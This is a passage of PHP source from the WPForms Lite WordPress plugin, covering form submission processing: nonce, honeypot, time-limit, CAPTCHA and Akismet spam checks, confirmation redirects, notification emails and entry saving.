if ( isset( $_POST['__amp_form_verify'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Missing
if ( empty( $errors[ $form_id ] ) ) {
wp_send_json( [], 200 );
} else {
$verify_errors = [];
foreach ( $errors[ $form_id ] as $field_id => $error_fields ) {
$field = $this->form_data['fields'][ $field_id ];
$field_properties = wpforms()->get( 'frontend' )->get_field_properties( $field, $this->form_data );
if ( is_string( $error_fields ) ) {
if ( $field['type'] === 'checkbox' || $field['type'] === 'radio' || $field['type'] === 'select' ) {
$first = current( $field_properties['inputs'] );
$name = $first['attr']['name'];
} elseif ( isset( $field_properties['inputs']['primary']['attr']['name'] ) ) {
$name = $field_properties['inputs']['primary']['attr']['name'];
}
$verify_errors[] = [
'name' => $name,
'message' => $error_fields,
];
} else {
foreach ( $error_fields as $error_field => $error_message ) {
if ( isset( $field_properties['inputs'][ $error_field ]['attr']['name'] ) ) {
$name = $field_properties['inputs'][ $error_field ]['attr']['name'];
}
$verify_errors[] = [
'name' => $name,
'message' => $error_message,
];
}
}
}
wp_send_json(
[
'verifyErrors' => $verify_errors,
],
400
);
}
return;
}
if ( ! empty( $errors[ $form_id ] ) ) {
if ( empty( $errors[ $form_id ]['header'] ) && empty( $errors[ $form_id ]['footer'] ) ) {
$errors[ $form_id ]['header'] = esc_html__( 'Form has not been submitted, please see the errors below.', 'wpforms-lite' );
}
$this->errors = $errors;
return;
}
// If a logged-in user fails the nonce check, we want to log the entry, disable the errors and fail silently.
// Please note that logs may be disabled and in this case nothing will be logged or reported.
if (
is_user_logged_in() &&
( empty( $entry['nonce'] ) || ! wp_verify_nonce( $entry['nonce'], "wpforms::form_{$form_id}" ) )
) {
// Logs XSS attempt depending on log levels set.
wpforms_log(
'Cross-site scripting attempt ' . uniqid( '', true ),
[ true, $entry ],
[
'type' => [ 'security' ],
'form_id' => $this->form_data['id'],
]
);
// Fail silently.
return;
}
$honeypot = wpforms()->get( 'honeypot' )->validate( $this->form_data, $this->fields, $entry );
// If we trigger the honey pot, we want to log the entry, disable the errors, and fail silently.
if ( $honeypot ) {
$this->log_spam_entry( $entry, $honeypot );
// Fail silently.
return;
}
$token = wpforms()->get( 'token' )->validate( $this->form_data, $this->fields, $entry );
// If spam - return early.
// For antispam, we want to make sure that we have a value, we are not using AMP, and the value is an error string.
if ( $token && ! wpforms_is_amp() && is_string( $token ) ) {
$this->errors[ $this->form_data['id'] ]['header'] = $token;
$this->log_spam_entry( $entry, $token );
return;
}
// Pass the form created date into the form data.
$this->form_data['created'] = $form->post_date;
// Format fields.
foreach ( (array) $this->form_data['fields'] as $field_properties ) {
$field_id = $field_properties['id'];
$field_type = $field_properties['type'];
$field_submit = isset( $entry['fields'][ $field_id ] ) ? $entry['fields'][ $field_id ] : '';
/**
* Format field by type.
*
* @since 1.4.0
*
* @param string $field_id Field ID.
* @param string $field_submit Submitted field value.
* @param array $form_data Form data and settings.
*/
do_action( "wpforms_process_format_{$field_type}", $field_id, $field_submit, $this->form_data );
}
/**
* Format form data after all fields have been processed.
* This hook is for internal purposes and should not be leveraged.
*
* @since 1.4.0
*
* @param array $form_data Form data and settings.
*/
do_action( 'wpforms_process_format_after', $this->form_data );
/**
* Filter fields before processing.
* Process hooks/filter - this is where most addons should hook
* because at this point we have completed all field validation and
* formatted the data.
*
* @since 1.4.0
*
* @param array $fields Form fields.
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data and settings.
*/
$this->fields = apply_filters( 'wpforms_process_filter', $this->fields, $entry, $this->form_data );
/**
* Process form fields.
*
* @since 1.4.0
*
* @param array $fields Form fields.
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data and settings.
*/
do_action( 'wpforms_process', $this->fields, $entry, $this->form_data );
/**
* Process form fields by form ID.
*
* @since 1.4.0
*
* @param array $fields Form fields.
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data and settings.
*/
do_action( "wpforms_process_{$form_id}", $this->fields, $entry, $this->form_data );
/**
* Filter fields after processing.
*
* @since 1.4.0
*
* @param array $fields Form fields.
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data and settings.
*/
$this->fields = apply_filters( 'wpforms_process_after_filter', $this->fields, $entry, $this->form_data );
if ( ! $this->is_bypass_spam_check( $entry ) ) {
// Check if the form was submitted too quickly.
$this->time_limit_check();
// Check for spam.
$this->process_spam_check( $entry );
}
$store_spam_entries = ! empty( $this->form_data['settings']['store_spam_entries'] ) && $this->form_data['settings']['store_spam_entries'];
// Mark submission as spam if one of the spam checks failed and spam entries are stored.
$marked_as_spam = $this->spam_reason && $store_spam_entries;
// Store spam reason.
if ( $this->spam_reason ) {
$this->form_data['spam_reason'] = $this->spam_reason;
}
// Convert spam errors to form errors if spam entries are not stored.
if ( ! $store_spam_entries && ! empty( $this->spam_errors ) ) {
$this->errors = $this->spam_errors;
}
// One last error check - don't proceed if there are any errors.
if ( ! empty( $this->errors[ $form_id ] ) ) {
if ( empty( $this->errors[ $form_id ]['header'] ) && empty( $this->errors[ $form_id ]['footer'] ) ) {
$this->errors[ $form_id ]['header'] = esc_html__( 'Form has not been submitted, please see the errors below.', 'wpforms-lite' );
}
return;
}
// Set raw post data.
$this->form_data['post_data_raw'] = [
'page_url' => isset( $_POST['page_url'] ) ? esc_url_raw( wp_unslash( $_POST['page_url'] ) ) : '',
];
// Success - add entry to database.
$this->entry_id = $this->entry_save( $this->fields, $entry, $this->form_data['id'], $this->form_data );
// Add payment to database.
$payment_id = $this->payment_save( $entry );
/**
* Runs right after adding entry to the database.
*
* @since 1.7.7
* @since 1.8.2 Added Payment ID param.
*
* @param array $fields Fields data.
* @param array $entry User submitted data.
* @param array $form_data Form data.
* @param int $entry_id Entry ID.
* @param int $payment_id Payment ID.
*/
do_action( 'wpforms_process_entry_saved', $this->fields, $entry, $this->form_data, $this->entry_id, $payment_id );
// Fire the logic to send notification emails.
$this->entry_email( $this->fields, $entry, $this->form_data, $this->entry_id, 'entry' );
// Pass completed and formatted fields in POST.
$_POST['wpforms']['complete'] = $this->fields;
// Pass entry ID in POST.
$_POST['wpforms']['entry_id'] = $this->entry_id;
// Logs entry depending on log levels set.
if ( wpforms()->is_pro() ) {
wpforms_log(
$this->entry_id ? "Entry {$this->entry_id}" : 'Entry',
$this->fields,
[
'type' => [ 'entry' ],
'parent' => $this->entry_id,
'form_id' => $this->form_data['id'],
]
);
}
// Does not proceed if a form is marked as spam.
if ( ! $marked_as_spam ) {
$this->process_complete( $form_id, $this->form_data, $this->fields, $entry, $this->entry_id );
}
$this->entry_confirmation_redirect( $this->form_data );
}
/**
* Log spam entry.
*
* @since 1.8.3
*
* @param array $entry Form submission raw data ($_POST).
* @param string $message Spam message.
*/
private function log_spam_entry( $entry, $message ) {
wpforms_log(
'Spam Entry ' . uniqid( '', true ),
[ $message, $entry ],
[
'type' => [ 'spam' ],
'form_id' => $this->form_data['id'],
]
);
}
/**
* Check if the form was submitted too quickly.
*
* @since 1.8.3
*/
private function time_limit_check() { // phpcs:ignore Generic.Metrics.CyclomaticComplexity.TooHigh
/**
* Allow bypassing the time limit check.
*
* @since 1.8.3
*
* @param bool $bypass Whether to bypass the time limit check, default false.
* @param array $form_data Form data.
*
* @return bool
*/
if ( apply_filters( 'wpforms_process_time_limit_check_bypass', false, $this->form_data ) ) {
return;
}
$settings = $this->form_data['settings'];
$time_limit = ! empty( $settings['anti_spam']['time_limit'] ) ? $settings['anti_spam']['time_limit'] : [];
$enabled = ! empty( $time_limit['enable'] );
$duration = ! empty( $time_limit['duration'] ) ? absint( $time_limit['duration'] ) : 0;
if ( ! $enabled || $duration <= 0 ) {
return;
}
// Convert seconds to milliseconds.
$duration *= 1000;
//phpcs:disable WordPress.Security.NonceVerification.Missing
$start = ! empty( $_POST['start_timestamp'] ) ? absint( $_POST['start_timestamp'] ) : 0;
$end = ! empty( $_POST['end_timestamp'] ) ? absint( $_POST['end_timestamp'] ) : 0;
//phpcs:enable WordPress.Security.NonceVerification.Missing
// Filter out empty fields.
$fields = array_filter(
$this->fields,
function( $field ) {
return ! empty( $field['value'] );
}
);
// Skip time limit check if the form was submitted with prefilled values.
if ( $start === 0 && ! empty( $fields ) ) {
return;
}
// If the form was submitted too quickly, add an error.
if ( ( $end - $start ) < $duration || $start === 0 ) {
$this->errors[ $this->form_data['id'] ]['header'] = esc_html__( 'Please wait a little longer before submitting. We’re running a quick security check.', 'wpforms-lite' );
}
}
/**
* Process complete.
*
* @since 1.8.3
*
* @param int $form_id Form ID.
* @param array $form_data Form data and settings.
* @param array $fields Fields data.
* @param array $entry Form submission raw data ($_POST).
* @param int $entry_id Entry ID.
*/
public function process_complete( $form_id, $form_data, $fields, $entry, $entry_id ) {
/**
* Runs right after the form has been successfully submitted.
*
* @since 1.0.0
* @since 1.8.3 Added $entry parameter.
*
* @param array $fields Fields data.
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data.
* @param int $entry_id Entry ID.
*/
do_action( 'wpforms_process_complete', $fields, $entry, $form_data, $entry_id );
/**
* Runs right after the form has been successfully submitted by form ID.
*
* @since 1.0.0
* @since 1.8.3 Added $entry parameter.
*
* @param array $fields Fields data.
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data.
* @param int $entry_id Entry ID.
*/
do_action( "wpforms_process_complete_{$form_id}", $fields, $entry, $form_data, $entry_id );
}
/**
* Check for spam.
*
* @since 1.8.3
*
* @param array $entry Form submission raw data ($_POST).
*/
public function process_spam_check( $entry ) {
// CAPTCHA check.
$this->process_captcha( $entry );
if ( $this->spam_reason ) {
return;
}
$akismet = wpforms()->get( 'akismet' )->validate( $this->form_data, $entry );
// If Akismet marks the entry as spam, we want to log the entry and fail silently.
if ( $akismet ) {
$this->spam_errors[ $this->form_data['id'] ]['header'] = $akismet;
// Log the spam entry depending on log levels set.
$this->log_spam_entry( $entry, $akismet );
$this->spam_reason = esc_html__( 'Akismet', 'wpforms-lite' );
}
}
/**
* Is bypass spam check.
*
* @since 1.8.3
*
* @param array $entry Form submission raw data ($_POST).
*
* @return bool
*/
protected function is_bypass_spam_check( $entry ) {
/**
* Filter to bypass CAPTCHA check.
*
* @since 1.6.6
*
* @param bool $bypass_captcha Whether to bypass CAPTCHA check.
* @param array $entry Form submission raw data ($_POST).
* @param array $form_data Form data.
*/
return apply_filters( 'wpforms_process_bypass_captcha', false, $entry, $this->form_data );
}
/**
* Process captcha.
*
* @since 1.8.0
* @since 1.8.3 Removed $captcha_settings parameter.
*
* @param array $entry Form submission raw data ($_POST).
*
* @return void
*/
private function process_captcha( $entry ) { // phpcs:ignore Generic.Metrics.CyclomaticComplexity.TooHigh,Generic.Metrics.CyclomaticComplexity.MaxExceeded
$captcha_settings = wpforms_get_captcha_settings();
if ( ! $this->allow_process_captcha( $entry, $captcha_settings ) ) {
return;
}
$provider = $captcha_settings['provider'];
$current_captcha = $this->get_captcha( $provider );
if ( empty( $current_captcha ) ) {
return;
}
$verify_url_raw = $current_captcha['verify_url_raw'];
$captcha_provider = $current_captcha['provider'];
$post_key = $current_captcha['post_key'];
/* translators: %s - The CAPTCHA provider name. */
$error = wpforms_setting( "{$provider}-fail-msg", sprintf( esc_html__( '%s verification failed, please try again later.', 'wpforms-lite' ), $captcha_provider ) );
// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.NonceVerification.Missing
$token = ! empty( $_POST[ $post_key ] ) ? $_POST[ $post_key ] : false;
$is_recaptcha_v3 = $provider === 'recaptcha' && $captcha_settings['recaptcha_type'] === 'v3';
if ( $is_recaptcha_v3 ) {
// phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized, WordPress.Security.ValidatedSanitizedInput.MissingUnslash, WordPress.Security.NonceVerification.Missing
$token = ! empty( $_POST['wpforms']['recaptcha'] ) ? $_POST['wpforms']['recaptcha'] : false;
}
$verify_query_arg = [
'secret' => $captcha_settings['secret_key'],
'response' => $token,
'remoteip' => wpforms_get_ip(),
];
if ( ! $token ) {
$this->errors[ $this->form_data['id'] ]['recaptcha'] = $error;
return;
}
/*
* hCaptcha uses user IP to better detect bots and their attacks on a form.
* Majority of our users have GDPR disabled.
* So we remove this data from the request only when it's not needed, depending on wpforms_is_collecting_ip_allowed($this->form_data) check.
*/
if ( ! wpforms_is_collecting_ip_allowed( $this->form_data ) ) {
unset( $verify_query_arg['remoteip'] );
}
/**
* Change query arguments for remote call to the captcha API.
*
* @since 1.8.0
*
* @param array $verify_query_arg The query arguments for verify URL.
* @param array $form_data Form data and settings.
*/
$verify_query_arg = apply_filters( 'wpforms_process_captcha_verify_query_arg', $verify_query_arg, $this->form_data );
/**
* Filter the CAPTCHA verify URL.
*
* @since 1.6.4
* @since 1.8.0 Added $form_data argument.
*
* @param string $verify_url The full CAPTCHA verify URL.
* @param string $verify_url_raw The CAPTCHA verify URL without query.
* @param array $verify_query_arg The query arguments for verify URL.
* @param array $form_data Form data and settings.
*/
$verify_url = apply_filters( 'wpforms_process_captcha_verify_url', $verify_url_raw, $verify_url_raw, $verify_query_arg, $this->form_data );
$response = wp_remote_post( $verify_url, [ 'body' => $verify_query_arg ] );
$response_body = json_decode( wp_remote_retrieve_body( $response ), false );
if (
empty( $response_body->success ) ||
( $is_recaptcha_v3 && $response_body->score <= wpforms_setting( 'recaptcha-v3-threshold', '0.4' ) )
) {
if ( $is_recaptcha_v3 && isset( $response_body->score ) ) {
$error .= ' (' . esc_html( $response_body->score ) . ')';
}
$this->spam_errors[ $this->form_data['id'] ]['recaptcha'] = $error;
$this->log_spam_entry( $entry, $error );
$this->spam_reason = $captcha_provider;
}
}
/**
* Check if CAPTCHA processing is allowed.
*
* @since 1.8.3
*
* @param array $entry Form entry data.
* @param array $captcha_settings CAPTCHA settings.
*
* @return bool
*/
private function allow_process_captcha( $entry, $captcha_settings ) { // phpcs:ignore Generic.Metrics.CyclomaticComplexity.TooHigh
// Skip captcha processing if AMP form.
if ( isset( $_POST['__amp_form_verify'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Missing
return false;
}
// Skip captcha processing if provider is not set.
if ( empty( $captcha_settings['provider'] ) ) {
return false;
}
$provider = $captcha_settings['provider'];
// Skip captcha processing if provider is set to none.
if ( $provider === 'none' ) {
return false;
}
// Skip captcha processing if site key or secret key is empty.
if ( empty( $captcha_settings['site_key'] ) || empty( $captcha_settings['secret_key'] ) ) {
return false;
}
$form_data_settings = isset( $this->form_data['settings'] ) ? $this->form_data['settings'] : [];
$is_recaptcha = isset( $form_data_settings['recaptcha'] ) && (int) $form_data_settings['recaptcha'] === 1;
// Skip captcha processing if reCAPTCHA is disabled for this form.
if ( ! $is_recaptcha ) {
return false;
}
$recaptcha_type = $captcha_settings['recaptcha_type'];
$is_recaptcha_v3 = $provider === 'recaptcha' && $recaptcha_type === 'v3';
// Skip captcha processing on AMP if not using reCAPTCHA v3. AMP requires Google reCAPTCHA v3.
if ( ! $is_recaptcha_v3 && wpforms_is_amp() ) {
return false;
}
return true;
}
/**
* Get all available CAPTCHA providers.
*
* @since 1.8.3
*
* @return array
*/
private function get_captcha_providers() {
/**
* Filter the CAPTCHA providers.
*
* @since 1.8.3
*
* @param array $providers The CAPTCHA providers.
*/
return apply_filters(
'wpforms_process_captcha_providers',
[
'hcaptcha' => [
'verify_url_raw' => 'https://hcaptcha.com/siteverify',
'provider' => 'hCaptcha',
'post_key' => 'h-captcha-response',
],
'recaptcha' => [
'verify_url_raw' => 'https://www.google.com/recaptcha/api/siteverify',
'provider' => 'Google reCAPTCHA',
'post_key' => 'g-recaptcha-response',
],
'turnstile' => [
'verify_url_raw' => 'https://challenges.cloudflare.com/turnstile/v0/siteverify',
'provider' => 'Cloudflare Turnstile',
'post_key' => 'cf-turnstile-response', // The key is specified by the API.
],
]
);
}
/**
* Get CAPTCHA provider data.
*
* @since 1.8.3
*
* @param string $provider CAPTCHA provider.
*
* @return array
*/
private function get_captcha( $provider ) {
$captcha_providers = $this->get_captcha_providers();
if ( ! isset( $captcha_providers[ $provider ] ) ) {
return [];
}
return $captcha_providers[ $provider ];
}
/**
* Check if combined upload size exceeds allowed maximum.
*
* @since 1.6.0
*
* @param \WP_Post $form Form post object.
*/
public function validate_combined_upload_size( $form ) {
$form_id = (int) $form->ID;
$upload_fields = wpforms_get_form_fields( $form, [ 'file-upload' ] );
if ( ! empty( $upload_fields ) && ! empty( $_FILES ) ) {
// Get $_FILES keys generated by WPForms only.
$files_keys = preg_filter( '/^/', 'wpforms_' . $form_id . '_', array_keys( $upload_fields ) );
// Filter uploads without errors. Individual errors are handled by WPForms_Field_File_Upload class.
$files = wp_list_filter( wp_array_slice_assoc( $_FILES, $files_keys ), [ 'error' => 0 ] );
$files_size = array_sum( wp_list_pluck( $files, 'size' ) );
$files_size_max = wpforms_max_upload( true );
if ( $files_size > $files_size_max ) {
// Add new header error preserving previous ones.
$this->errors[ $form_id ]['header'] = ! empty( $this->errors[ $form_id ]['header'] ) ? $this->errors[ $form_id ]['header'] . '<br>' : '';
$this->errors[ $form_id ]['header'] .= esc_html__( 'Uploaded files combined size exceeds allowed maximum.', 'wpforms-lite' );
}
}
}
/**
* Validate the form return hash.
*
* @since 1.0.0
*
* @param string $hash Base64-encoded hash of form and entry IDs.
*
* @return array|false False for invalid or form id.
*/
public function validate_return_hash( $hash = '' ) {
$query_args = base64_decode( $hash );
parse_str( $query_args, $output );
// Verify hash matches.
if ( wp_hash( $output['form_id'] . ',' . $output['entry_id'] ) !== $output['hash'] ) {
return false;
}
// Get lead and verify it is attached to the form we received with it.
$entry = wpforms()->get( 'entry' )->get( $output['entry_id'], [ 'cap' => false ] );
if ( empty( $entry->form_id ) ) {
return false;
}
if ( $output['form_id'] !== $entry->form_id ) {
return false;
}
return [
'form_id' => absint( $output['form_id'] ),
'entry_id' => absint( $output['form_id'] ),
'fields' => $entry !== null && isset( $entry->fields ) ? $entry->fields : [],
];
}
/**
* Check if the confirmation data are valid.
*
* @since 1.6.4
*
* @param array $data The confirmation data.
*
* @return bool
*/
protected function is_valid_confirmation( $data ) {
if ( empty( $data['type'] ) ) {
return false;
}
// Confirmation type: redirect, page or message.
$type = $data['type'];
return isset( $data[ $type ] ) && ! wpforms_is_empty_string( $data[ $type ] );
}
/**
* Redirect user to a page or URL specified in the form confirmation settings.
*
* @since 1.0.0
*
* @param array $form_data Form data and settings.
* @param string $hash Base64-encoded hash of form and entry IDs.
*/
public function entry_confirmation_redirect( $form_data = [], $hash = '' ) {
// Maybe process return hash.
if ( ! empty( $hash ) ) {
$hash_data = $this->validate_return_hash( $hash );
if ( ! $hash_data || ! is_array( $hash_data ) ) {
return;
}
$this->valid_hash = true;
$this->entry_id = absint( $hash_data['entry_id'] );
$this->fields = json_decode( $hash_data['fields'], true );
$this->form_data = wpforms()->get( 'form' )->get(
absint( $hash_data['form_id'] ),
[
'content_only' => true,
]
);
} else {
$this->form_data = $form_data;
}
// Backward compatibility.
if ( empty( $this->form_data['settings']['confirmations'] ) ) {
$this->form_data['settings']['confirmations'][1]['type'] = ! empty( $this->form_data['settings']['confirmation_type'] ) ? $this->form_data['settings']['confirmation_type'] : 'message';
$this->form_data['settings']['confirmations'][1]['message'] = ! empty( $this->form_data['settings']['confirmation_message'] ) ? $this->form_data['settings']['confirmation_message'] : esc_html__( 'Thanks for contacting us! We will be in touch with you shortly.', 'wpforms-lite' );
$this->form_data['settings']['confirmations'][1]['message_scroll'] = ! empty( $this->form_data['settings']['confirmation_message_scroll'] ) ? $this->form_data['settings']['confirmation_message_scroll'] : 1;
$this->form_data['settings']['confirmations'][1]['page'] = ! empty( $this->form_data['settings']['confirmation_page'] ) ? $this->form_data['settings']['confirmation_page'] : '';
$this->form_data['settings']['confirmations'][1]['redirect'] = ! empty( $this->form_data['settings']['confirmation_redirect'] ) ? $this->form_data['settings']['confirmation_redirect'] : '';
}
if ( empty( $this->form_data['settings']['confirmations'] ) || ! is_array( $this->form_data['settings']['confirmations'] ) ) {
return;
}
$confirmations = $this->form_data['settings']['confirmations'];
// Reverse sort confirmations by id to process newer ones first.
krsort( $confirmations );
$default_confirmation_key = min( array_keys( $confirmations ) );
foreach ( $confirmations as $confirmation_id => $confirmation ) {
// Last confirmation should execute in any case.
if ( $default_confirmation_key === $confirmation_id ) {
break;
}
if ( ! $this->is_valid_confirmation( $confirmation ) ) {
continue;
}
// phpcs:disable WPForms.PHP.ValidateHooks.InvalidHookName
/**
* Process confirmation filter.
*
* @since 1.4.8
*
* @param bool $process Whether to process the logic or not.
* @param array $fields List of submitted fields.
* @param array $form_data Form data and settings.
* @param int $id Confirmation ID.
*/
$process_confirmation = apply_filters( 'wpforms_entry_confirmation_process', true, $this->fields, $this->form_data, $confirmation_id );
// phpcs:enable WPForms.PHP.ValidateHooks.InvalidHookName
if ( $process_confirmation ) {
break;
}
}
$url = '';
// Redirect if needed, to either a page or URL, after form processing.
if ( ! empty( $confirmations[ $confirmation_id ]['type'] ) && 'message' !== $confirmations[ $confirmation_id ]['type'] ) {
if ( $confirmations[ $confirmation_id ]['type'] === 'redirect' ) {
$rawurlencode_callback = static function ( $value ) {
return $value === null ? null : rawurlencode( $value );
};
add_filter( 'wpforms_smarttags_process_field_id_value', $rawurlencode_callback );
$url = wpforms_process_smart_tags( $confirmations[ $confirmation_id ]['redirect'], $this->form_data, $this->fields, $this->entry_id );
remove_filter( 'wpforms_smarttags_process_field_id_value', $rawurlencode_callback );
}
if ( 'page' === $confirmations[ $confirmation_id ]['type'] ) {
$url = get_permalink( (int) $confirmations[ $confirmation_id ]['page'] );
}
}
if ( ! empty( $url ) ) {
$url = apply_filters( 'wpforms_process_redirect_url', $url, $this->form_data['id'], $this->fields, $this->form_data, $this->entry_id );
if ( wpforms_is_amp() ) {
/** This filter is documented in wp-includes/pluggable.php */
$url = apply_filters( 'wp_redirect', $url, 302 );
$url = wp_sanitize_redirect( $url );
header( sprintf( 'AMP-Redirect-To: %s', $url ) );
header( 'Access-Control-Expose-Headers: AMP-Redirect-To', false );
wp_send_json(
[
'message' => __( 'Redirecting…', 'wpforms-lite' ),
'redirecting' => true,
],
200
);
} else {
wp_redirect( esc_url_raw( $url ) ); // phpcs:ignore
}
do_action( 'wpforms_process_redirect', $this->form_data['id'] );
do_action( "wpforms_process_redirect_{$this->form_data['id']}", $this->form_data['id'] );
exit;
}
// Pass a message to a frontend if no redirection happened.
if ( ! empty( $confirmations[ $confirmation_id ]['type'] ) && 'message' === $confirmations[ $confirmation_id ]['type'] ) {
$this->confirmation = $confirmations[ $confirmation_id ];
$this->confirmation_message = $confirmations[ $confirmation_id ]['message'];
if ( ! empty( $confirmations[ $confirmation_id ]['message_scroll'] ) ) {
wpforms()->get( 'frontend' )->confirmation_message_scroll = true;
}
}
}
/**
* Get confirmation message.
*
* @since 1.5.3
*
* @param array $form_data Form data and settings.
* @param array $fields Sanitized field data.
* @param int $entry_id Entry id.
*
* @return string Confirmation message.
*/
public function get_confirmation_message( $form_data, $fields, $entry_id ) {
if ( empty( $this->confirmation_message ) ) {
return '';
}
$confirmation_message = wpforms_process_smart_tags( $this->confirmation_message, $form_data, $fields, $entry_id );
$confirmation_message = apply_filters( 'wpforms_frontend_confirmation_message', wpautop( $confirmation_message ), $form_data, $fields, $entry_id );
return $confirmation_message;
}
/**
* Get current confirmation.
*
* @since 1.6.9
*
* @return array
*/
public function get_current_confirmation() {
return ! empty( $this->confirmation ) ? $this->confirmation : [];
}
/**
* Catch the post_max_size overflow.
*
* @since 1.5.2
*
* @return bool
*/
public function post_max_size_overflow() {
// phpcs:disable WordPress.Security.NonceVerification
if ( empty( $_SERVER['CONTENT_LENGTH'] ) || empty( $_GET['wpforms_form_id'] ) ) {
return false;
}
$form_id = (int) $_GET['wpforms_form_id'];
$total_size = (int) $_SERVER['CONTENT_LENGTH'];
$post_max_size = wpforms_size_to_bytes( ini_get( 'post_max_size' ) );
if ( ! ( $total_size > $post_max_size && empty( $_POST ) && $form_id > 0 ) ) {
return false;
}
// phpcs:enable WordPress.Security.NonceVerification
$error_msg = esc_html__( 'Form has not been submitted, please see the errors below.', 'wpforms-lite' );
$error_msg .= '<br>' . sprintf( /* translators: %1$.3f - total size of the selected files in megabytes, %2$.3f - allowed file upload limit in megabytes.*/
esc_html__( 'The total size of the selected files %1$.3f MB exceeds the allowed limit %2$.3f MB.', 'wpforms-lite' ),
esc_html( $total_size / 1048576 ),
esc_html( $post_max_size / 1048576 )
);
$this->errors[ $form_id ]['header'] = $error_msg;
return true;
}
/**
* Send entry email notifications.
*
* @since 1.0.0
*
* @param array $fields List of fields.
* @param array $entry Submitted form entry.
* @param array $form_data Form data and settings.
* @param int $entry_id Saved entry id.
* @param string $context In which context this email is sent.
*/
public function entry_email( $fields, $entry, $form_data, $entry_id, $context = '' ) {
// Check that the form was configured for email notifications.
if ( empty( $form_data['settings']['notification_enable'] ) ) {
return;
}
/**
* Allow entry email notifications to be disabled.
*
* @since 1.0.0
*
* @param bool $enabled Whether to send the email.
* @param array $fields List of fields.
* @param array $entry Form submission raw data.
* @param array $form_data Form data and settings.
*/
if ( ! apply_filters( 'wpforms_entry_email', true, $fields, $entry, $form_data ) ) { // phpcs:ignore WPForms.PHP.ValidateHooks.InvalidHookName
return;
}
// Make sure we have and entry id.
if ( empty( $this->entry_id ) ) {
$this->entry_id = (int) $entry_id;
}
/**
* Filter entry email notifications data.
*
* @since 1.0.0
*
* @param array $fields List of fields.
* @param array $entry Form submission raw data.
* @param array $form_data Form data and settings.
*/
$fields = apply_filters( 'wpforms_entry_email_data', $fields, $entry, $form_data ); // phpcs:ignore WPForms.PHP.ValidateHooks.InvalidHookName
// Backwards compatibility for notifications before v1.4.3.
if ( empty( $form_data['settings']['notifications'] ) && ! empty( $form_data['settings']['notification_email'] ) ) {
$notifications[1] = [
'email' => $form_data['settings']['notification_email'],
'subject' => $form_data['settings']['notification_subject'],
'sender_name' => $form_data['settings']['notification_fromname'],
'sender_address' => $form_data['settings']['notification_fromaddress'],
'replyto' => $form_data['settings']['notification_replyto'],
'message' => '{all_fields}',
];
} else {
$notifications = $form_data['settings']['notifications'];
}
foreach ( $notifications as $notification_id => $notification ) :
if ( empty( $notification['email'] ) ) {
continue;
}
/**
* Allow entry email notifications to be disabled for a specific notification.
*
* @since 1.0.0
*
* @param bool $enabled Whether to send the email.
* @param array $fields List of fields.
* @param array $form_data Form data and settings.
* @param int $notification_id Notification ID.
* @param string $context In which context this email is sent.
*/
$process_email = apply_filters( 'wpforms_entry_email_process', true, $fields, $form_data, $notification_id, $context );
if ( ! $process_email ) {
continue;
}
$email = [];
// Setup email properties.
$email['subject'] = ! empty( $notification['subject'] ) ?
$notification['subject'] :
sprintf( /* translators: %s - form name. */
esc_html__( 'New %s Entry', 'wpforms-lite' ),
$form_data['settings']['form_title']
);
$email['address'] = explode( ',', wpforms_process_smart_tags( $notification['email'], $form_data, $fields, $this->entry_id ) );
$email['address'] = array_map( 'sanitize_email', $email['address'] );
$email['sender_address'] = ! empty( $notification['sender_address'] ) ? $notification['sender_address'] : get_option( 'admin_email' );
$email['sender_name'] = ! empty( $notification['sender_name'] ) ? $notification['sender_name'] : get_bloginfo( 'name' );
$email['replyto'] = ! empty( $notification['replyto'] ) ? $notification['replyto'] : false;
$email['message'] = ! empty( $notification['message'] ) ? $notification['message'] : '{all_fields}';
$email['template'] = ! empty( $notification['template'] ) ? $notification['template'] : '';
/**
* Filter entry email notifications attributes.
*
* @since 1.0.0
*
* @param array $email Email attributes.
* @param array $fields List of fields.
* @param array $entry Form submission raw data.
* @param array $form_data Form data and settings.
* @param int $notification_id Notification ID.
*/
$email = apply_filters( 'wpforms_entry_email_atts', $email, $fields, $entry, $form_data, $notification_id ); // phpcs:ignore WPForms.PHP.ValidateHooks.InvalidHookName
// Create new email.
$emails = ( new WPForms\Emails\Notifications() )->init( $email['template'] );
$emails->__set( 'form_data', $form_data );
$emails->__set( 'fields', $fields );
$emails->__set( 'notification_id', $notification_id );
$emails->__set( 'entry_id', $this->entry_id );
$emails->__set( 'from_name', $email['sender_name'] );
$emails->__set( 'from_address', $email['sender_address'] );
$emails->__set( 'reply_to', $email['replyto'] );
// Maybe include CC.
if ( ! empty( $notification['carboncopy'] ) && wpforms_setting( 'email-carbon-copy', false ) ) {
$emails->__set( 'cc', $notification['carboncopy'] );
}
/**
* Filter entry email notifications before sending.
*
* @since 1.0.0
*
* @param object $emails WPForms_WP_Emails instance.
*/
$emails = apply_filters( 'wpforms_entry_email_before_send', $emails );
// Go.
foreach ( $email['address'] as $address ) {
$emails->send( trim( $address ), $email['subject'], $email['message'] );
}
endforeach;
}
/**
* Save entry to database.
*
* @since 1.0.0
*
* @param array $fields List of form fields.
* @param array $entry User submitted data.
* @param int $form_id Form ID.
* @param array $form_data Prepared form settings.
*
* @return int
*/
public function entry_save( $fields, $entry, $form_id, $form_data = [] ) {
$fields = $this->remove_raw_data_before_save( $fields );
/**
* Fires on entry save.
*
* @since 1.0.0
*
* @param array $fields List of form fields.
* @param array $entry Form submission raw data.
* @param int $form_id Form ID.
* @param array $form_data Prepared form settings.
*/
do_action( 'wpforms_process_entry_save', $fields, $entry, $form_id, $form_data );
return $this->entry_id;
}
/**
* Remove raw data from fields before saving.
* This is needed to prevent raw password data from being saved to the database.
*
* @since 1.8.6
*
* @param array $fields List of form fields.
*
* @return array
*/
private function remove_raw_data_before_save( array $fields ): array {
foreach ( $fields as $key => $field ) {
if ( ! empty( $field['type'] ) && $field['type'] === 'password' ) {
unset( $fields[ $key ]['value_raw'] );
}
}
return $fields;
}
/**
* Save payment to the database.
*
* @since 1.8.2
*
* @param array $entry User submitted data.
*
